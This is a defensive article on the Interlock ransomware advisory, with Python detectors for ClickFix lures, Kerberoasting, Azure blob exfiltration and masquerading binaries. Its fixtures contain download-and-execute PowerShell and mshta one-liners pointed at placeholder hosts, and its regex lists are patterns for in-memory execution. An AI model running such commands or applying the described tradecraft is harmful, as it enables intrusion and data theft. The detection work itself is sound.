The latest joint advisory from the FBI, CISA, HHS, and MS-ISAC paints a sharp and disturbing picture of Interlock, a ransomware strain that has quietly evolved into one of the more dangerous threats to enterprise networks in recent memory. If you are in the business of defending public or private infrastructure, this alert concerns you. Interlock relies on uncommon initial-access tactics, evades traditional controls, and targets virtualized environments with surgical precision.
ClickFix, Drive-Bys, and Fake Security Tools
Initial access is where Interlock breaks the mold. Where most ransomware groups still lean on phishing and RDP brute force, Interlock gets in through:
- Drive-by downloads from compromised legitimate websites.
- Fake updates not just for browsers, but now masquerading as endpoint security products (FortiClient, AnyConnect, Ivanti, etc.).
- The cleverly designed “ClickFix” technique: a fake CAPTCHA or “verification” page tells the user to prove they are human by pressing Win+R, Ctrl+V and Enter. The page has already placed a PowerShell one-liner on the clipboard, so the user pastes it into the Run dialog and launches the loader with their own hands. No vulnerability is exploited and no attachment is opened, which is exactly why it bypasses many automated defenses.
If your SOC is still focused primarily on phishing detection or known-exploit scanning, you will miss this. These payloads never traverse the email gateway; they are staged on sites your users already trust and require a human action, not just code execution.
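The practical consequence of the ClickFix chain is that the process tree, not the mail gateway, is where you catch it: the Run dialog is hosted by explorer.exe, so the tell is explorer.exe spawning PowerShell or mshta with a download-and-execute command line, and the pasted command survives on disk in the RunMRU registry key. The following Python is an added example written for this article, not code from the advisory or from the Interlock toolset; the Sysmon-shaped event records, the RunMRU hive dump and the example.invalid URLs are constructed, and the interpreter list and argument patterns are assumptions you would tune to your environment.

```python
import re

# Interpreters a ClickFix lure typically has the victim launch from the Run dialog.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}

# Traits of a pasted download-and-execute one-liner (assumed patterns, tune locally).
SUSPICIOUS_ARGS = [
    re.compile(r"-(?:w|window(?:style)?)\s+hidden", re.I),                  # hidden window
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I),  # base64 payload
    re.compile(r"\biex\b|invoke-expression", re.I),                          # in-memory execution
    re.compile(r"downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I),  # fetches a stage
    re.compile(r"https?://", re.I),                                          # remote stage URL
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_cmdline(image: str, cmdline: str) -> bool:
    """True when an interpreter is invoked with ClickFix-style arguments. mshta pointed
    at a URL is enough on its own; the others need two traits so that an admin typing
    plain 'powershell' into the Run box does not fire."""
    exe = basename(image)
    if exe not in INTERPRETERS:
        return False
    hits = sum(1 for p in SUSPICIOUS_ARGS if p.search(cmdline))
    return hits >= (1 if exe == "mshta.exe" else 2)


def is_clickfix(ev: dict) -> bool:
    """ev is shaped like a Sysmon Event ID 1 record. The Run dialog runs under
    explorer.exe, so the parent is the anchor: an Office or browser parent spawning
    PowerShell belongs to a different (phishing / drive-by) rule, not this one."""
    return (basename(ev["ParentImage"]) == "explorer.exe"
            and suspicious_cmdline(ev["Image"], ev["CommandLine"]))


def scan_events(events):
    return [ev for ev in events if is_clickfix(ev)]


def runmru_hits(runmru: dict):
    """Forensic check of the Run dialog history kept under
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU: values a, b,
    c ... hold 'command\\1' and MRUList orders them newest first. Returns the entries
    that look like a pasted ClickFix command."""
    hits = []
    for slot in runmru.get("MRUList", ""):
        raw = runmru.get(slot, "")
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        if not cmd.strip():
            continue
        exe = cmd.split(None, 1)[0].strip('"')
        if not exe.lower().endswith(".exe"):
            exe += ".exe"
        if suspicious_cmdline(exe, cmd):
            hits.append(cmd)
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"CORP\jdoe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/v -UseBasicParsing)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "User": r"CORP\jdoe", "CommandLine": "mshta https://example.invalid/verify.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "User": r"CORP\admin",
     "CommandLine": "powershell"},                                  # admin opening a console
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "Image": PS,
     "User": r"CORP\jdoe", "CommandLine": "powershell -w hidden -enc SQBFAFgAIAAoAE4A"},  # macro: other rule
]
SAMPLE_RUNMRU = {  # constructed hive values
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "iex(iwr http://example.invalid/v)"\\1',
}

if __name__ == "__main__":
    for ev in scan_events(SAMPLE_EVENTS):
        print("ClickFix:", ev["User"], ev["CommandLine"])
    for cmd in runmru_hits(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

The two-trait threshold is deliberate: a single URL or a single `-w hidden` shows up in plenty of legitimate admin one-liners, but an explorer.exe parent plus two of those traits is rare outside a ClickFix lure. The RunMRU check is the host-forensics counterpart for machines where process telemetry was not yet enabled.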
Remote Access Trojans and RAT-Chaining
Once inside, Interlock establishes persistence using:
- A PowerShell script that drops a file into the Windows Startup folder, so the RAT relaunches at every logon.
- A registry autorun entry named “Chrome Updater”, chosen to blend in with Google's legitimate update task.
- Familiar toolkits like Cobalt Strike and SystemBC, alongside newer RATs such as NodeSnake, seen in infections as recently as March 2025.
This blend of legacy and newer tooling makes attribution harder and post-exploitation detection less consistent: instead of hunting one toolset, you are chasing a rotating C2 strategy.
Stealing to Escalate
Interlock follows the “steal first, encrypt later” model, and its credential theft is particularly aggressive. TTPs include:
- Deployment of Lumma Stealer, Berserk Stealer, and custom binaries like cht.exe.
- Keylogging via klg.dll, with keystrokes written to a file under an innocuous name, conhost.txt.
- RDP abuse, AnyDesk, and PuTTY for lateral movement.
- Kerberoasting for domain privilege escalation: requesting service tickets for SPN-bearing accounts and cracking them offline, which needs nothing more than a valid domain user.
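Kerberoasting leaves a clean trace in the domain controller's Security log: event 4769 (service ticket requested) records the requesting account, the service name and the ticket encryption type. Two signals matter: one account requesting tickets for many user-account SPNs in a short burst, and any RC4-HMAC (0x17) ticket for a user account, since roasting tools ask for RC4 because it cracks far faster than AES. The Python below is an added example for this article, not code from the advisory; the 4769 records are constructed and the window and threshold values are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # TicketEncryptionType for RC4-HMAC in event 4769; AES is 0x11 / 0x12


def kerberoast_candidates(events, window=timedelta(seconds=60), min_services=5):
    """Group 4769 records by requesting account and flag either a burst of distinct
    user-account SPNs inside one window, or any RC4 service ticket for a user account.
    Returns {account: {"distinct_services": n, "rc4_tickets": n}} for the hits."""
    by_requester = defaultdict(list)
    for ev in events:
        svc = ev["ServiceName"]
        # Machine accounts (trailing $) and the KDC's own krbtgt are not roastable
        # targets and dominate normal 4769 volume, so drop them before counting.
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_requester[ev["TargetUserName"]].append(
            (datetime.fromisoformat(ev["time"]), svc, ev["TicketEncryptionType"]))

    findings = {}
    for account, reqs in by_requester.items():
        reqs.sort(key=lambda r: r[0])
        best = {"distinct_services": 0, "rc4_tickets": 0}
        for i, (t0, _, _) in enumerate(reqs):          # sliding window over the requests
            in_window = [r for r in reqs[i:] if r[0] - t0 <= window]
            stats = {
                "distinct_services": len({s for _, s, _ in in_window}),
                "rc4_tickets": sum(1 for _, _, etype in in_window if etype == RC4_HMAC),
            }
            if stats["distinct_services"] > best["distinct_services"]:
                best = stats
        if best["distinct_services"] >= min_services or best["rc4_tickets"] > 0:
            findings[account] = best
    return findings


def rec(time, who, svc, etype):
    return {"time": time, "TargetUserName": who, "ServiceName": svc,
            "TicketEncryptionType": etype}


SAMPLE_4769 = [  # constructed records, not real log data
    rec("2025-03-10T08:00:01", "jdoe@CORP.LOCAL", "svc_sql", "0x17"),
    rec("2025-03-10T08:00:01", "jdoe@CORP.LOCAL", "svc_backup", "0x17"),
    rec("2025-03-10T08:00:02", "jdoe@CORP.LOCAL", "svc_iis", "0x17"),
    rec("2025-03-10T08:00:02", "jdoe@CORP.LOCAL", "svc_sccm", "0x17"),
    rec("2025-03-10T08:00:03", "jdoe@CORP.LOCAL", "svc_exchange", "0x17"),
    rec("2025-03-10T08:00:03", "jdoe@CORP.LOCAL", "FS01$", "0x12"),      # file share, ignored
    rec("2025-03-10T08:15:00", "asmith@CORP.LOCAL", "svc_sql", "0x12"),  # ordinary AES request
    rec("2025-03-10T09:00:00", "WS07$@CORP.LOCAL", "krbtgt", "0x12"),    # TGT renewal noise
]

if __name__ == "__main__":
    for account, stats in kerberoast_candidates(SAMPLE_4769).items():
        print(account, stats)
```

The RC4 signal only works if your domain has actually moved service accounts to AES; an environment that still hands out RC4 tickets by default will need the burst signal alone, with the threshold set against a baseline of what your busiest service accounts request per minute.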
Cloud Storage as a Staging Ground
Data exfiltration is conducted with Azure Storage Explorer and AzCopy, so stolen data is shipped to Microsoft Azure blob storage before any encryption begins. This signals a few things:
- They are comfortable abusing cloud-native tooling.
- They are bypassing traditional perimeter-based DLP controls: the transfer is TLS to *.blob.core.windows.net, a Microsoft domain most organizations already allow.
- They anticipate IR teams watching for FTP or SMB exfil, not cloud service usage.
And, as the cherry on top, WinSCP shows up when needed: yet another legitimate tool repurposed for malicious transfer.
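Because the destination is a Microsoft domain your proxy already trusts, the useful discriminator is not “traffic to Azure” but “traffic to a storage account we do not own, from a host that has no business running a bulk-transfer tool”. The Python below is an added example for this article, not code from the advisory; it runs over a constructed proxy/EDR export, and the owned-account list, the approved-host list and the byte threshold are assumptions you would replace with your own inventory.

```python
import csv
import io
from collections import defaultdict

# Assumptions for the example: storage accounts the org owns and hosts expected to
# run bulk-transfer tools. These two lists are what gives the rule its signal.
KNOWN_STORAGE_ACCOUNTS = {"corpbackups01", "corpartifacts"}
BULK_TRANSFER_HOSTS = {"BACKUP01"}
TRANSFER_TOOLS = {"azcopy.exe", "storageexplorer.exe", "winscp.exe"}
BULK_BYTES = 500 * 1024 * 1024          # 500 MiB per host/destination pair
BLOB_SUFFIX = ".blob.core.windows.net"

SAMPLE_LOG = """\
time,host,user,process,dest_host,dest_port,bytes_out
2025-03-11T02:10:03,FS02,CORP\\svc_admin,azcopy.exe,x7k2q9.blob.core.windows.net,443,8112233440
2025-03-11T02:10:05,FS02,CORP\\svc_admin,azcopy.exe,x7k2q9.blob.core.windows.net,443,7334455660
2025-03-11T02:30:00,BACKUP01,CORP\\backupsvc,azcopy.exe,corpbackups01.blob.core.windows.net,443,9000000000
2025-03-11T03:01:12,WS14,CORP\\jdoe,chrome.exe,corpartifacts.blob.core.windows.net,443,120034
2025-03-11T03:05:40,FS02,CORP\\svc_admin,winscp.exe,203.0.113.45,22,950000000
"""  # constructed export, not real traffic


def storage_account(dest_host: str):
    """'acct.blob.core.windows.net' -> 'acct'; None for non-blob destinations."""
    h = dest_host.lower()
    return h[: -len(BLOB_SUFFIX)] if h.endswith(BLOB_SUFFIX) else None


def analyze(log_text: str):
    """Aggregate bytes per (host, destination) and attach reasons. Returns
    {"HOST->dest": {"bytes_out": n, "reasons": set()}} for pairs with any reason."""
    totals = defaultdict(lambda: {"bytes_out": 0, "reasons": set()})
    for row in csv.DictReader(io.StringIO(log_text)):
        key = f"{row['host']}->{row['dest_host']}"
        entry = totals[key]
        entry["bytes_out"] += int(row["bytes_out"])
        acct = storage_account(row["dest_host"])
        if acct is not None and acct not in KNOWN_STORAGE_ACCOUNTS:
            entry["reasons"].add("unknown storage account")
        if row["process"].lower() in TRANSFER_TOOLS and row["host"] not in BULK_TRANSFER_HOSTS:
            entry["reasons"].add(f"{row['process']} on host not approved for bulk transfer")
    for key, entry in totals.items():
        host = key.split("->", 1)[0]
        if entry["bytes_out"] >= BULK_BYTES and host not in BULK_TRANSFER_HOSTS:
            entry["reasons"].add("bulk upload from non-transfer host")
    return {k: v for k, v in totals.items() if v["reasons"]}


if __name__ == "__main__":
    for key, entry in analyze(SAMPLE_LOG).items():
        print(f"{key}: {entry['bytes_out']:,} bytes; " + "; ".join(sorted(entry["reasons"])))
```

Note what does not fire: the backup server pushing 9 GB to an account you own, and a workstation pulling a small artifact from another owned account. The file server pushing 15 GB to an account nobody recognizes, and the same server later opening an SFTP session with WinSCP, are the rows that matter.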
What Makes the Encryption Payload Noteworthy
The encryptor itself has a few quirks:
- The Windows payload is named conhost.exe, a masquerade of the legitimate console host, which only ever runs from C:\Windows\System32.
- On Linux systems, the ELF-based encryptor includes a function named removeme that deletes the binary after encryption, an anti-forensic step that is uncommon in VM-targeted Linux ransomware.
- In some Windows variants, a malicious DLL (tmp41.wasd) is executed via rundll32.exe to trigger the self-delete sequence; the odd extension is itself a detection opportunity, since rundll32 rarely loads a module that is not a .dll.
Files are typically appended with .interlock or .1nt3rlock, and ransom notes (!__README__!.txt) are pushed via Group Policy Objects. This is domain-aware, policy-driven deployment across enterprise environments: by the time the note lands, the actor already holds the rights to write GPOs.
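Three of the artifacts above share one weakness: a name chosen to look legitimate, attached to something that is not where the legitimate thing lives. The Python below is an added example for this article (not code from the advisory or from Interlock) that turns that into checks: the “Chrome Updater” autorun from the persistence section, and the out-of-place conhost.exe and the rundll32-loaded tmp41.wasd from this one. The expected-directory table, the sample records and the rundll32 entry-point name in the sample are assumptions made for the example.

```python
import re

# Where these Windows binaries legitimately live (assumption for the example; extend it).
EXPECTED_DIRS = {
    "conhost.exe": {"c:\\windows\\system32"},
    "rundll32.exe": {"c:\\windows\\system32", "c:\\windows\\syswow64"},
}
# Directories an unprivileged user can write to; a "system" binary here is a red flag.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
GOOGLE_DIRS = ("c:\\program files\\google\\", "c:\\program files (x86)\\google\\")


def split_path(path: str):
    """Lower-cased (directory, filename) of a Windows path; quotes and slashes normalised."""
    p = path.strip('"').replace("/", "\\").lower()
    d, _, name = p.rpartition("\\")
    return d, name


def first_token(cmdline: str) -> str:
    """Executable or module reference at the start of a command line, quotes stripped."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def check_process(image: str, cmdline: str):
    """Reasons a process-creation record deserves a look; [] when clean."""
    reasons = []
    d, name = split_path(image)
    if name in EXPECTED_DIRS and d not in EXPECTED_DIRS[name]:
        reasons.append(f"{name} outside its system directory: {image}")
    if name == "rundll32.exe":
        # rundll32 takes "<module>,<entrypoint>"; the module should be a .dll (or .cpl).
        rest = re.sub(r'^\s*(?:"[^"]+"|\S+)\s*', "", cmdline)
        module = first_token(rest).split(",")[0]
        if module and not module.lower().endswith((".dll", ".cpl")):
            reasons.append(f"rundll32 loading non-DLL module: {module}")
    return reasons


def check_autorun(name: str, command: str):
    """Reasons a Run-key or Startup-folder entry deserves a look; [] when clean."""
    reasons = []
    target_dir, target_name = split_path(first_token(command))
    if re.search(r"chrome|google", name, re.I) and not (target_dir + "\\").startswith(GOOGLE_DIRS):
        reasons.append(f"'{name}' mimics Google's updater but points at {target_dir}\\{target_name}")
    exe = target_name if target_name.endswith(".exe") else target_name + ".exe"
    if exe in INTERPRETERS:
        reasons.append(f"'{name}' launches a script interpreter: {command}")
    if target_dir.startswith(USER_WRITABLE):
        reasons.append(f"'{name}' runs from a user-writable directory: {target_dir}")
    return reasons


def triage(processes, autoruns):
    """Run both checks; returns [(label, reasons)] for the records that fired."""
    hits = []
    for image, cmdline in processes:
        if r := check_process(image, cmdline):
            hits.append((image, r))
    for name, command in autoruns:
        if r := check_autorun(name, command):
            hits.append((name, r))
    return hits


SAMPLE_PROCESSES = [  # constructed (image, command line) pairs
    (r"C:\Users\Public\conhost.exe", "conhost.exe"),                         # encryptor masquerade
    (r"C:\Windows\System32\conhost.exe", r"\??\C:\Windows\system32\conhost.exe 0x4"),  # real one
    (r"C:\Windows\System32\rundll32.exe", r"rundll32.exe C:\ProgramData\tmp41.wasd,run"),  # entry point assumed
    (r"C:\Windows\System32\rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),
]
SAMPLE_AUTORUNS = [  # constructed (value name, command) pairs from a Run key
    ("Chrome Updater", r"powershell -w hidden -f C:\Users\jdoe\AppData\Roaming\up.ps1"),
    ("Google Update", r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c'),
    ("Updater", r"C:\Users\jdoe\AppData\Local\Temp\svc.exe"),
]

if __name__ == "__main__":
    for label, reasons in triage(SAMPLE_PROCESSES, SAMPLE_AUTORUNS):
        print(label, "->", "; ".join(reasons))
```

Real autorun entries that point at Google's updater resolve under Program Files; a value named “Chrome Updater” that launches PowerShell from a profile directory fails every check at once, which is why name/location consistency is a cheaper first pass than signature matching against the individual sample.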
The Ransom Model
The note includes no upfront price. Victims are instructed to connect to a .onion site via Tor, where the actual demand and wallet information are delivered. Payment is in Bitcoin. And unlike some groups, Interlock follows through on its threats: stolen data does get leaked if the ransom isn't paid.
They’re not trying to shock or spread chaos. This is about calculated financial return, tailored extortion, and confidence that victims won’t call their bluff.
Mitigations You Need to Implement
Here’s what federal agencies recommend:
- Prevent initial access by implementing domain name system (DNS) filtering and web access firewalls, and by training users to spot social engineering attempts such as the fake CAPTCHA and fake update lures described above.
- Mitigate known vulnerabilities by ensuring operating systems, software, and firmware are patched and up to date.
- Segment networks to restrict lateral movement from initially infected devices to other devices in the same organization.
- Implement identity, credential, and access management (ICAM) policies across the organization, and then require multifactor authentication (MFA) for all services to the extent possible.